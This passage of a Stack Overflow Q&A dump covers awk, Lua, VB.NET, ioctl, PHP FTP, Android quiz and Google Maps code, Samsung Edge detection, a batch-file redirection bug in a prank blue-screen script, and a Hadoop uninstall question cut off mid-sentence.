0.000 et 0.076 er 0.066] ------- [33:0 0:0 30 0] [13] 0 0\nr 10.104096612 _33_ MAC --- 0 ACK 38 [0 21 0 0] [energy 1989.895903 ei 9.962 es 0.000 et 0.076 er 0.066] \nr 10.104114453 _14_ MAC --- 0 AODV 48 [0 ffffffff f 800] [energy 1989.895886 ei 10.069 es 0.000 et 0.003 er 0.032] ------- [33:255 -1:255 \n<\/code>\nAnswer: I guess this is because of your modulo. Indeed, in awk <code>1.00001 % 2 = 1.00001<\/code>. So if you never have a rounded time (i.e. X.0), your last if will never be true. Try using <code>int()<\/code>:\n<code>if ($1 == \"r\" && $4 ==\"AGT\" && (int($2) % 10) == 0)\n<\/code>\nAnswer: You are using <code>nReceived<\/code> in the printing rule which is never set\/modified. So most likely that causes an error.\nAnd on \"<code>r<\/code>\" lines in your example input <code>$4<\/code> is always \"<code>RTR<\/code>\" which results in a division by zero...\nAnd next time please tell us, what is not working? No output? Error message?\nComment: Division by zero is explained in my answer above: you are trying to use `nReceived` as divisor but it's not existing at the time.\nComment: I was getting no output. After applying @Shitsu's advice for casting to int now I receive a division by zero notice. Also, note that the actual trace file was too big too include here, so I just gave it partially.\nComment: You are right. I mistakenly typed `nReceived` instead of `nRecvd`.\n","meta":{"source":"stackoverflow","title":"AWK modulo does not work correctly with trace file","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get a certain value from a concatenated table\n\nQuestion: Trying to allow a concatenated table to be referenced as such: \n<code>local group = table.concat(arguments, \",\", 1)\n<\/code>\nwhere arguments = {\"1,1,1\"}\nCurrently, doing <code>group[2]<\/code> gives me the comma. How do I avoid that while still allowing for two-digit numbers?\n(snippet of what I'm trying to use it for)\n<code>for i = 1, #group do\ntarget:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\nComment: `table.concat` turns a table into a string. If `arguments` is a table of one string `table.concat` isn't going to do anything particularly meaningful for you.\nAnswer: Maybe you want something like\n<code>local i = 1\nfor v in string.gmatch(s, \"(%w+),*\") do\n group[i] = v\n i = i + 1\nend\n<\/code>\nRevised version in response to comment, avoiding the table altogether:\n<code>local i = 1\nfor v in string.gmatch(s, \"(%w+),*\") do\n target:SetGroup(i, tonumber(v))\n i = i + 1\nend\n<\/code>\nComment: I wanted the target:SetGroup feature to run as many times as there are numbers (if it's \"1,1,1\", run 3 times, each time the first \"i\" in setgroup is changing from 1 to 2 to 3). It would also use the numbers from the supplied table. How would I implement this?\nComment: The code I provided creates the table from the string. The code in your question should work fine with the `group` table it builds. Or you could avoid tables altogether with the revised version.\nAnswer: split function (you have to add it to code)\n<code>split = function(str, delim)\n if not delim then\n delim = \" \"\n end\n -- Eliminate bad cases...\n if string.find(str, delim) == nil then\n return { str }\n end\n local result = {}\n local pat = \"(.-)\" .. delim .. \"()\"\n local nb = 0\n local lastPos\n for part, pos in string.gfind(str, pat) do\n nb = nb + 1\n result[nb] = part\n lastPos = pos\n end\n -- Handle the last field\n result[nb + 1] = string.sub(str, lastPos)\n return result\nend\n<\/code>\nso\n<code>local arguments = {\"1,1,1\"};\nlocal group = split(arguments[1], \",\");\n\nfor i = 1, #group do\n target:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\n\nalso note that\n<code>local arguments = {\"1,1,1\"};\nlocal group = split(arguments[1], \",\");\nlocal group_count = #group;\n\nfor i = 1, group_count do\n target:SetGroup(i, tonumber(group[i]))\nend\n<\/code>\nis faster code ;)\nComment: The second version isn't faster code. It could even be slightly slower because it has an extra assignment to a local variable (and there is more code to parse\/compile) ...\n","meta":{"source":"stackoverflow","title":"Get a certain value from a concatenated table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Using a textbox value for a file name\n\nQuestion: How do you use a textbox value for VB to save some text to? This is what I have so far:\n<code>Private Sub Button1_Click(sender As Object, e As EventArgs) Handles butUpdate.Click\n Dim ECOLID As String\n ECOLID = txtID.Text\n Dim file As System.IO.StreamWriter\n file = My.Computer.FileSystem.OpenTextFileWriter(\"?\", True)\n file.WriteLine(\"ECOL Number:\")\n file.WriteLine(txtID.Text)\n file.Close()\nEnd Sub\n<\/code>\nThe txtID text will determine the title however how can I get it to save it as \"C:\/Order\/'txtID'.txt\" for example?\nAnswer: A textbox has a property called Name and this is (usually) the same as the variable name that represent the TextBox in your code.\nSo, if you want to create a file with the same name of your textbox you could write\n<code> file = My.Computer.FileSystem.OpenTextFileWriter(txtID.Name & \".txt\", True)\n<\/code>\nHowever there is a big improvement to make to your code\n<code>Private Sub Button1_Click(sender As Object, e As EventArgs) Handles butUpdate.Click\n Dim ECOLID As String\n ECOLID = txtID.Text\n Dim fileName = txtID.Name & \".txt\"\n Using file = My.Computer.FileSystem.OpenTextFileWriter(fileName, True)\n file.WriteLine(\"ECOL Number:\")\n file.WriteLine(txtID.Text)\n End Using\nEnd Sub\n<\/code>\nIn this version the opening of the StreamWriter object is enclosed in a Using Statement. This is fundamental to correctly release the resources to the operating system when you have done to work with your file because the End Using ensures that your file is closed and disposed correctly also in case of exceptions\n","meta":{"source":"stackoverflow","title":"Using a textbox value for a file name","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where can I find the definition for a system call parameter?\n\nQuestion: In the ioctl man page it defines:\n<code>int ioctl(int d,int request,...); \n<\/code>\nFor example:\n<code>ioctl(fd,FIONREAD,&nread); \n<\/code>\nWhere can I find this FIONREAD information in Linux? Where is this information defined? How many types are there like this?\nComment: `man ioctl` -> `#include ` -> \/usr\/include\/bits\/ioctls.h -> \/usr\/include\/asm\/ioctls.h -> asm-generic\/ioctls.h -> #define FIONREAD 0x541B\nAnswer: In general, the man page of the system call (<code>man 2 ioctl<\/code> \u2014\u00a0section 2 is for system calls) is the right place.\n<code>ioctl<\/code> is a special case because the point of this system call is to allow applications to send commands to devices that don't fit in the general mold. So often the documentation of the parameters is not in the documentation of <code>ioctl<\/code>, but in the documentation of device drivers. Man pages for devices are in section 4 (or section 7 on some Unix variants).\nOn Linux, the <code>ioctl(2)<\/code> man page references <code>ioctl_list(2)<\/code> which contains a summary of common ioctl types. There is more documentation about some ioctls in device man pages such as <code>tty_ioctl(4)<\/code> (terminals \u2014\u00a0that's what <code>FIONREAD<\/code> is used for) and <code>sd(4)<\/code> (disks with a SCSI-like interface). More ioctl are documented in the kernel documentation, for example for CD drives. For many drivers, Linux lacks documentation and you need to refer to the kernel source code or the headers (search under <code>\/usr\/include<\/code> and hope that you'll find comments).\nAnswer: As a rule of thumb, any time you have an identifier in all caps, at least in the c language, it is usually defined in a header file somewhere. It could be a type, an enum, or it could be an explicitly defined symbol. Most of the time, looking in the header file is only useful to see what other possible options you have to choose from. Using find and grep will usually locate the file (linux example):\n<code>cd \/usr\/include; find . -type f -name \\*.h -print0 | xargs -0 grep <name>\n<\/code>\n","meta":{"source":"stackoverflow","title":"Where can I find the definition for a system call parameter?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Read and write to remote file PHP\n\nQuestion: I am trying to read and write a remote a file to the user's browser through CodeIgniter(FTP Class). That is, I want user to read the file edit the content and save it back.\nOne way will be \n- download the file to my server\n- read the file and echo to the user(Browser)\n- Save the content of the file to local copy(My server)\n- upload the file back to the server\nBut I don't want to download the file to my server I just want to read and write to remote file\nAnswer: You can write it to the temporary file and after displaying just delete it using unlink() function in the same script. Just call it straight after echoing the content. The file will be present on your server for a really short period of time. FTP is used to upload files, but not for editing them remotely. Any FTP client supporting file edit is actually saving it to the temp folder on your computer and after the edit uploads it back to the server.\n","meta":{"source":"stackoverflow","title":"Read and write to remote file PHP","dup_signals":{}},"subset":"stackexchange"} +{"text":"Randomize array of questions while reading from text file android\n\nQuestion: This is a android quiz app code snippet which load the question from text file.\nI want to shuffle the question and answer after every next click so how can i implement random function ?\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/src\/ssk\/quizfun\/QuizFunActivity.java\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/res\/raw\/questions.txt \n<code> private void loadQuestions() throws Exception {\n try {\n InputStream questions = this.getBaseContext().getResources()\n .openRawResource(R.raw.questions);\n bReader = new BufferedReader(new InputStreamReader(questions));\n StringBuilder quesString = new StringBuilder();\n String aJsonLine = null;\n while ((aJsonLine = bReader.readLine()) != null) {\n quesString.append(aJsonLine);\n }\n Log.d(this.getClass().toString(), quesString.toString());\n JSONObject quesObj = new JSONObject(quesString.toString());\n quesList = quesObj.getJSONArray(\"Questions\");\n Log.d(this.getClass().getName(),\n \"Num Questions \" + quesList.length());\n } catch (Exception e){\n\n } finally {\n try {\n bReader.close();\n } catch (Exception e) {\n Log.e(\"\", e.getMessage().toString(), e.getCause());\n }\n\n }\n\n }\n\nhttps:\/\/github.com\/gitssk\/quizfun\/blob\/master\/src\/ssk\/quizfun\/QuizFunActivity.java\n<\/code>\nComment: oviosuly you can shuffle with Collections.shuffle\nComment: can you give me some example\nComment: `Collections.shuffle` on a `JSONArray`? Is that even possible?\nComment: You could have a look at [Aleadam's solution](http:\/\/stackoverflow.com\/questions\/5531130\/an-efficient-way-to-shuffle-a-json-array-in-java).\nAnswer: I will refrain from posting much code because I think you should attempt it on your own. It is seriously not that tough. I will give you an approach though.\nYou have <code>quesList = quesObj.getJSONArray(\"Questions\");<\/code>. So <code>quesList<\/code> is the list of questions that is a <code>JSONArray<\/code>. You want to shuffle this. Just do this:\n\nGet the length of the <code>quesList<\/code> array. Let's call it <code>len<\/code>.\nCreate a simple arrayList called <code>quesOrder<\/code> containing integers <code>0 to len<\/code>.\n<code>List<Integer> quesOrder = new ArrayList<>();\nfor (int i = 0; i <= len; i++)\n{\n quesOrder.add(i);\n}\n<\/code>\n\nOnce you have the <code>quesOrder<\/code> array. Just do <code>Collections.shuffle(quesOrder);<\/code>. Now when you get questions from your <code>quesList<\/code> array, just get the index from <code>quesOrder<\/code> list. And you will have a randomized selection. Put it together in a function for convenience.\n","meta":{"source":"stackoverflow","title":"Randomize array of questions while reading from text file android","dup_signals":{}},"subset":"stackexchange"} +{"text":"Driving distance and travel time duration between two locations in Google Map Android API V2\n\nQuestion: I am trying to implement this example in android studio:\ndriving distance and travel time duration between two locations\nI am facing errors during runtime as follows:\n<code>E\/GMPM: getGoogleAppId failed with status: 10\nE\/GMPM: Uploading is not possible. App measurement disabled\nD\/AndroidRuntime: Shutting down VM\nE\/AndroidRuntime: FATAL EXCEPTION: main\nProcess: com.start.yogeshp.location, PID: 7332\njava.lang.RuntimeException: Unable to start activity ComponentInfo{com.start.yogeshp.location\/com.start.yogeshp.location.MainActivity}: android.view.InflateException: Binary XML file line #19: Error inflating class fragment\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2298)\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\nat android.os.Handler.dispatchMessage(Handler.java:102)\nat android.os.Looper.loop(Looper.java:135)\nat android.app.ActivityThread.main(ActivityThread.java:5221)\nat java.lang.reflect.Method.invoke(Native Method)\nat java.lang.reflect.Method.invoke(Method.java:372)\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\nCaused by: android.view.InflateException: Binary XML file line #19: Error inflating class fragment\nat android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:763)\nat android.view.LayoutInflater.rInflate(LayoutInflater.java:806)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:504)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:414)\nat android.view.LayoutInflater.inflate(LayoutInflater.java:365)\nat com.android.internal.policy.impl.PhoneWindow.setContentView(PhoneWindow.java:377)\nat android.app.Activity.setContentView(Activity.java:2144)\nat com.start.yogeshp.location.MainActivity.onCreate(MainActivity.java:40)\nat android.app.Activity.performCreate(Activity.java:5937)\nat android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1105)\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2251)\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\u00a0\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\u00a0\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\u00a0\nat android.os.Handler.dispatchMessage(Handler.java:102)\u00a0\nat android.os.Looper.loop(Looper.java:135)\u00a0\nat android.app.ActivityThread.main(ActivityThread.java:5221)\u00a0\nat java.lang.reflect.Method.invoke(Native Method)\u00a0\nat java.lang.reflect.Method.invoke(Method.java:372)\u00a0\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\u00a0\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\u00a0\nCaused by: java.lang.NullPointerException\nat java.lang.VMClassLoader.findLoadedClass(Native Method)\nat java.lang.ClassLoader.findLoadedClass(ClassLoader.java:362)\nat java.lang.ClassLoader.loadClass(ClassLoader.java:499)\nat java.lang.ClassLoader.loadClass(ClassLoader.java:469)\nat android.support.v4.app.Fragment.isSupportFragmentClass(Fragment.java:457)\nat android.support.v4.app.FragmentManagerImpl.onCreateView(FragmentManager.java:2248)\nat android.support.v4.app.FragmentController.onCreateView(FragmentController.java:111)\nat android.support.v4.app.FragmentActivity.dispatchFragmentsOnCreateView(FragmentActivity.java:314)\nat android.support.v4.app.BaseFragmentActivityHoneycomb.onCreateView(BaseFragmentActivityHoneycomb.java:31)\nat android.support.v4.app.FragmentActivity.onCreateView(FragmentActivity.java:79)\nat android.view.LayoutInflater.createViewFromTag(LayoutInflater.java:733)\nat android.view.LayoutInflater.rInflate(LayoutInflater.java:806)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:504)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:414)\u00a0\nat android.view.LayoutInflater.inflate(LayoutInflater.java:365)\u00a0\nat com.android.internal.policy.impl.PhoneWindow.setContentView(PhoneWindow.java:377)\u00a0\nat android.app.Activity.setContentView(Activity.java:2144)\u00a0\nat com.start.yogeshp.location.MainActivity.onCreate(MainActivity.java:40)\u00a0\nat android.app.Activity.performCreate(Activity.java:5937)\u00a0\nat android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1105)\u00a0\nat android.app.ActivityThread.performLaunchActivity(ActivityThread.java:2251)\u00a0\nat android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2360)\u00a0\nat android.app.ActivityThread.access$800(ActivityThread.java:144)\u00a0\nat android.app.ActivityThread$H.handleMessage(ActivityThread.java:1278)\u00a0\nat android.os.Handler.dispatchMessage(Handler.java:102)\u00a0\nat android.os.Looper.loop(Looper.java:135)\u00a0\nat android.app.ActivityThread.main(ActivityThread.java:5221)\u00a0\nat java.lang.reflect.Method.invoke(Native Method)\u00a0\nat java.lang.reflect.Method.invoke(Method.java:372)\u00a0\nat com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:899)\u00a0\nat com.android.internal.os.ZygoteInit.main(ZygoteInit.java:694)\u00a0\n<\/code>\nThese are my files:\nMainActivity.java\n<code> public class MainActivity extends FragmentActivity {\n\nGoogleMap map;\nArrayList<LatLng> markerPoints;\nTextView tvDistanceDuration;\n@Override\nprotected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_main);\n\n tvDistanceDuration = (TextView) findViewById(R.id.tv_distance_time);\n\n \/\/ Initializing\n markerPoints = new ArrayList<LatLng>();\n\n \/\/ Getting reference to SupportMapFragment of the activity_main\n SupportMapFragment fm = (SupportMapFragment)getSupportFragmentManager().findFragmentById(R.id.map);\n\n \/\/ Getting Map for the SupportMapFragment\n map = fm.getMap();\n\n \/\/ Enable MyLocation Button in the Map\n map.setMyLocationEnabled(true);\n\n \/\/ Setting onclick event listener for the map\n map.setOnMapClickListener(new OnMapClickListener() {\n\n @Override\n public void onMapClick(LatLng point) {\n\n \/\/ Already two locations\n if(markerPoints.size()>1){\n markerPoints.clear();\n map.clear();\n }\n\n \/\/ Adding new item to the ArrayList\n markerPoints.add(point);\n\n \/\/ Creating MarkerOptions\n MarkerOptions options = new MarkerOptions();\n\n \/\/ Setting the position of the marker\n options.position(point);\n\n \/**\n * For the start location, the color of marker is GREEN and\n * for the end location, the color of marker is RED.\n *\/\n if(markerPoints.size()==1){\n options.icon(BitmapDescriptorFactory.defaultMarker(BitmapDescriptorFactory.HUE_GREEN));\n }else if(markerPoints.size()==2){\n options.icon(BitmapDescriptorFactory.defaultMarker(BitmapDescriptorFactory.HUE_RED));\n }\n\n \/\/ Add new marker to the Google Map Android API V2\n map.addMarker(options);\n\n \/\/ Checks, whether start and end locations are captured\n if(markerPoints.size() >= 2){\n LatLng origin = markerPoints.get(0);\n LatLng dest = markerPoints.get(1);\n\n \/\/ Getting URL to the Google Directions API\n String url = getDirectionsUrl(origin, dest);\n\n DownloadTask downloadTask = new DownloadTask();\n\n \/\/ Start downloading json data from Google Directions API\n downloadTask.execute(url);\n }\n }\n });\n}\n\nprivate String getDirectionsUrl(LatLng origin,LatLng dest){\n\n \/\/ Origin of route\n String str_origin = \"origin=\"+origin.latitude+\",\"+origin.longitude;\n\n \/\/ Destination of route\n String str_dest = \"destination=\"+dest.latitude+\",\"+dest.longitude;\n\n \/\/ Sensor enabled\n String sensor = \"sensor=false\";\n\n \/\/ Building the parameters to the web service\n String parameters = str_origin+\"&\"+str_dest+\"&\"+sensor;\n\n \/\/ Output format\n String output = \"json\";\n\n \/\/ Building the url to the web service\n String url = \"https:\/\/maps.googleapis.com\/maps\/api\/directions\/\"+output+\"?\"+parameters;\n\n return url;\n}\n\n\/** A method to download json data from url *\/\nprivate String downloadUrl(String strUrl) throws IOException{\n String data = \"\";\n InputStream iStream = null;\n HttpURLConnection urlConnection = null;\n try{\n URL url = new URL(strUrl);\n\n \/\/ Creating an http connection to communicate with url\n urlConnection = (HttpURLConnection) url.openConnection();\n\n \/\/ Connecting to url\n urlConnection.connect();\n\n \/\/ Reading data from url\n iStream = urlConnection.getInputStream();\n\n BufferedReader br = new BufferedReader(new InputStreamReader(iStream));\n\n StringBuffer sb = new StringBuffer();\n\n String line = \"\";\n while( ( line = br.readLine()) != null){\n sb.append(line);\n }\n\n data = sb.toString();\n\n br.close();\n\n }catch(Exception e){\n Log.d(\"Exception while downloading url\", e.toString());\n }finally{\n iStream.close();\n urlConnection.disconnect();\n }\n return data;\n}\n\n\/\/ Fetches data from url passed\nprivate class DownloadTask extends AsyncTask<String, Void, String>{\n\n \/\/ Downloading data in non-ui thread\n @Override\n protected String doInBackground(String... url) {\n\n \/\/ For storing data from web service\n String data = \"\";\n\n try{\n \/\/ Fetching the data from web service\n data = downloadUrl(url[0]);\n }catch(Exception e){\n Log.d(\"Background Task\",e.toString());\n }\n return data;\n }\n\n \/\/ Executes in UI thread, after the execution of\n \/\/ doInBackground()\n @Override\n protected void onPostExecute(String result) {\n super.onPostExecute(result);\n\n ParserTask parserTask = new ParserTask();\n\n \/\/ Invokes the thread for parsing the JSON data\n parserTask.execute(result);\n }\n}\n\n\/** A class to parse the Google Places in JSON format *\/\nprivate class ParserTask extends AsyncTask<String, Integer, List<List<HashMap<String,String>>> >{\n\n \/\/ Parsing the data in non-ui thread\n @Override\n protected List<List<HashMap<String, String>>> doInBackground(String... jsonData) {\n\n JSONObject jObject;\n List<List<HashMap<String, String>>> routes = null;\n\n try{\n jObject = new JSONObject(jsonData[0]);\n DirectionsJSONParser parser = new DirectionsJSONParser();\n\n \/\/ Starts parsing data\n routes = parser.parse(jObject);\n }catch(Exception e){\n e.printStackTrace();\n }\n return routes;\n }\n\n \/\/ Executes in UI thread, after the parsing process\n @Override\n protected void onPostExecute(List<List<HashMap<String, String>>> result) {\n ArrayList<LatLng> points = null;\n PolylineOptions lineOptions = null;\n MarkerOptions markerOptions = new MarkerOptions();\n String distance = \"\";\n String duration = \"\";\n\n if(result.size()<1){\n Toast.makeText(getBaseContext(), \"No Points\", Toast.LENGTH_SHORT).show();\n return;\n }\n\n \/\/ Traversing through all the routes\n for(int i=0;i<result.size();i++){\n points = new ArrayList<LatLng>();\n lineOptions = new PolylineOptions();\n\n \/\/ Fetching i-th route\n List<HashMap<String, String>> path = result.get(i);\n\n \/\/ Fetching all the points in i-th route\n for(int j=0;j<path.size();j++){\n HashMap<String,String> point = path.get(j);\n\n if(j==0){ \/\/ Get distance from the list\n distance = (String)point.get(\"distance\");\n continue;\n }else if(j==1){ \/\/ Get duration from the list\n duration = (String)point.get(\"duration\");\n continue;\n }\n\n double lat = Double.parseDouble(point.get(\"lat\"));\n double lng = Double.parseDouble(point.get(\"lng\"));\n LatLng position = new LatLng(lat, lng);\n\n points.add(position);\n }\n\n \/\/ Adding all the points in the route to LineOptions\n lineOptions.addAll(points);\n lineOptions.width(2);\n lineOptions.color(Color.RED);\n }\n\n tvDistanceDuration.setText(\"Distance:\"+distance + \", Duration:\"+duration);\n\n \/\/ Drawing polyline in the Google Map for the i-th route\n map.addPolyline(lineOptions);\n }\n} }\n<\/code>\nDirectionsJSONParser.java:\n<code> public class DirectionsJSONParser {\n\n\/** Receives a JSONObject and returns a list of lists containing latitude and longitude *\/\npublic List<List<HashMap<String,String>>> parse(JSONObject jObject){\n\n List<List<HashMap<String, String>>> routes = new ArrayList<List<HashMap<String,String>>>() ;\n JSONArray jRoutes = null;\n JSONArray jLegs = null;\n JSONArray jSteps = null;\n JSONObject jDistance = null;\n JSONObject jDuration = null;\n\n try {\n\n jRoutes = jObject.getJSONArray(\"routes\");\n\n \/** Traversing all routes *\/\n for(int i=0;i<jRoutes.length();i++){\n jLegs = ( (JSONObject)jRoutes.get(i)).getJSONArray(\"legs\");\n\n List<HashMap<String, String>> path = new ArrayList<HashMap<String, String>>();\n\n \/** Traversing all legs *\/\n for(int j=0;j<jLegs.length();j++){\n\n \/** Getting distance from the json data *\/\n jDistance = ((JSONObject) jLegs.get(j)).getJSONObject(\"distance\");\n HashMap<String, String> hmDistance = new HashMap<String, String>();\n hmDistance.put(\"distance\", jDistance.getString(\"text\"));\n\n \/** Getting duration from the json data *\/\n jDuration = ((JSONObject) jLegs.get(j)).getJSONObject(\"duration\");\n HashMap<String, String> hmDuration = new HashMap<String, String>();\n hmDuration.put(\"duration\", jDuration.getString(\"text\"));\n\n \/** Adding distance object to the path *\/\n path.add(hmDistance);\n\n \/** Adding duration object to the path *\/\n path.add(hmDuration);\n\n jSteps = ( (JSONObject)jLegs.get(j)).getJSONArray(\"steps\");\n\n \/** Traversing all steps *\/\n for(int k=0;k<jSteps.length();k++){\n String polyline = \"\";\n polyline = (String)((JSONObject)((JSONObject)jSteps.get(k)).get(\"polyline\")).get(\"points\");\n List<LatLng> list = decodePoly(polyline);\n\n \/** Traversing all points *\/\n for(int l=0;l<list.size();l++){\n HashMap<String, String> hm = new HashMap<String, String>();\n hm.put(\"lat\", Double.toString(((LatLng)list.get(l)).latitude) );\n hm.put(\"lng\", Double.toString(((LatLng)list.get(l)).longitude) );\n path.add(hm);\n }\n }\n }\n routes.add(path);\n }\n } catch (JSONException e) {\n e.printStackTrace();\n }catch (Exception e){\n }\n return routes;\n}\n\n\/**\n * Method to decode polyline points\n * Courtesy : jeffreysambells.com\/2010\/05\/27\/decoding-polylines-from-google-maps-direction-api-with-java\n * *\/\nprivate List<LatLng> decodePoly(String encoded) {\n\n List<LatLng> poly = new ArrayList<LatLng>();\n int index = 0, len = encoded.length();\n int lat = 0, lng = 0;\n\n while (index < len) {\n int b, shift = 0, result = 0;\n do {\n b = encoded.charAt(index++) - 63;\n result |= (b & 0x1f) << shift;\n shift += 5;\n } while (b >= 0x20);\n int dlat = ((result & 1) != 0 ? ~(result >> 1) : (result >> 1));\n lat += dlat;\n\n shift = 0;\n result = 0;\n do {\n b = encoded.charAt(index++) - 63;\n result |= (b & 0x1f) << shift;\n shift += 5;\n } while (b >= 0x20);\n int dlng = ((result & 1) != 0 ? ~(result >> 1) : (result >> 1));\n lng += dlng;\n\n LatLng p = new LatLng((((double) lat \/ 1E5)),\n (((double) lng \/ 1E5)));\n poly.add(p);\n }\n return poly;\n} }\n<\/code>\nactivity_main.xml:\ni used two fields in relative layout:\n<code> <TextView\n android:id=\"@+id\/tv_distance_time\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:text=\"@string\/hello_world\"\n android:layout_alignParentTop=\"true\" \/>\n\n<fragment\n android:id=\"@+id\/map\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:layout_below=\"@id\/tv_distance_time\" \/>\n<\/code>\nAndroidManifest.xml:\n<code><?xml version=\"1.0\" encoding=\"utf-8\"?>\n<\/code>\n\n<code><uses-permission android:name=\"android.permission.WRITE_EXTERNAL_STORAGE\"\/>\n<uses-permission android:name=\"com.google.android.providers.gsf.permission.READ_GSERVICES\"\/>\n<uses-permission android:name=\"android.permission.ACCESS_COARSE_LOCATION\"\/>\n<uses-permission android:name=\"android.permission.ACCESS_FINE_LOCATION\"\/>\n<permission\n android:name=\"com.start.yogeshp.location.permission.MAPS_RECEIVE\"\n android:protectionLevel=\"signature\" \/>\n\n<uses-permission android:name=\"com.start.yogeshp.location.permission.MAPS_RECEIVE\" \/>\n\n<uses-feature\n android:glEsVersion=\"0x00020000\"\n android:required=\"true\"\/>\n<application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap\/ic_launcher\"\n android:label=\"@string\/app_name\"\n android:supportsRtl=\"true\"\n android:theme=\"@style\/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" \/>\n\n <category android:name=\"android.intent.category.LAUNCHER\" \/>\n <\/intent-filter>\n <\/activity>\n <meta-data\n android:name=\"com.google.android.maps.v2.API_KEY\"\n android:value=\"key\" \/>\n\n<\/application>\n<\/code>\n\nand finally added \"compile 'com.google.android.gms:play-services:8.3.0'\" to my build.gradle file.\nComment: try\nComment: It worked..!!! thanks alot @JRowan\nComment: your welcome, ill put it as answer\nAnswer: in your layout you forgot the class attribute\n<code><fragment \nclass=\"com.google.android.gms.maps.SupportMapFragment\" \nandroid:id=\"@+id\/map\"\nandroid:layout_width=\"wrap_content\"\nandroid:layout_height=\"wrap_content\"\nandroid:layout_below=\"@id\/tv_distance_time\">\n<\/code>\n","meta":{"source":"stackoverflow","title":"Driving distance and travel time duration between two locations in Google Map Android API V2","dup_signals":{}},"subset":"stackexchange"} +{"text":"Identify if the android device is one of the samsung edge devices\n\nQuestion: I have a requirement in which I have to figure out if my android app is running on one of the samsung edge devices or its a regular android phone. Accordingly my ui would update. All i could gather is that the device name has a substring edge in it. Can someone suggest me a a a better way to do this ?\nComment: I think the only way is to store a list of edge device models in your app, and check current device against this list.\nComment: Yes of course that could be a way. But is there nothing which could inform me of this from the device itself ?\nComment: I don't think that Android itself has any clue about something called *edge*. It is a Samsung-only feature, and I believe there is nothing to identify it in Android OS.\nComment: Yes but devices do come with hardware information\nComment: try to get device name and model and add some if conditions if it works for you. refer this [link](https:\/\/stackoverflow.com\/a\/38157223\/6454463) to get device details.\nAnswer: For samsung device's, take a look at the Samsung programming guide for Edge, in page 10 :\n\ninitialize() initializes Look. You need to initialize the Look package\n before you can use it. If the device does not support Look,\n SsdkUnsupportedException exception is thrown.\nIf an SsdkUnsupportedException exception is thrown, check the\n exception message type using SsdkUnsupportedException.getType(). The\n following two types of exception messages are defined in the Slook\n class: \n VENDOR_NOT_SUPPORTED: The device is not a Samsung device.\n DEVICE_NOT_SUPPORTED: The device does not support the Look package.\n\nSo you can do this:\n<code>Slook slook = new Slook(); \ntry { \n slook.initialize(this); \/\/ it is a edge \n} catch(SsdkUnsupportedException e) \n{ \n \/\/ it is not an edge \n}\n<\/code>\nComment: I believe this will help, will approve the answer once after I implement it\n","meta":{"source":"stackoverflow","title":"Identify if the android device is one of the samsung edge devices","dup_signals":{}},"subset":"stackexchange"} +{"text":"This batch code is not working\n\nQuestion: Fake blue screen is not working: \nEverything after echo os the text even '***'\n\n<code>@echo off \nmode con: cols=160 lines=180\ncolor 1f \necho ***STOP: 0x000000D 1 (0x00000000, 0xF73120AE, 0xC0000008, 0xC0000000 \necho. \necho A problem has been detected and Windows has been shut down to prevent damage \necho to your computer\necho. \necho DRIVER_IRQL_NOT_LESS_OR_EQUAL \necho. \necho If this is the first time you've seen this Stop error screen, restart your \necho computer. If thi screen appears again, follow these steps: \necho. \necho Check to make sure any new hardware or software is properly installed. If this is a \necho new installation, ask your hardware or software manifacturer for any Windows updates \necho you might need. \necho. \necho If problems continue, disable or remove any newly installed hardware or software. \necho Disable BIOS memory options such as cachsing or shadowing. If you need to use Safe \necho Mode to remove or disable components, restart your computer, press f8 to select \necho Advanced Startup Options, and then select Safe Mode. \necho.\necho *** WXYZ.SYS - Adress F73120AE base at C00000000, DateStamp 36b07a3 \necho. \necho. \necho Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200> \necho Beginning dump of phisical memory \necho Physical memory dump complete. Contact your system administrator or \necho technical support group. \nPause \necho. \n<\/code>\n\nWhat did i do wrong?\nComment: Please provide your current output and the desired output so we can help you (at least clarify what are you looking for)\nComment: owkay Cristian Ramon-Cortes\nAnswer: The problem is the <code>><\/code> on this line\n<code>echo Kernel Debugger Using: COM2 (Port 0x2f8, Baud Rate 19200> \n<\/code>\nIt is recognized as redirection operator to write output to a file.\n","meta":{"source":"stackoverflow","title":"This batch code is not working","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to uninstall Hadoop 1.0.0\n\nQuestion: I set up my Hadoop clusters with Hadoop 2.0.2. Then, today I tried to test 1.0.0. So I downloaded the deb file from the Hadoop website and installed it: It did mess up everything. \nNow, when I type \"which -a hadoop\" I get 2 results 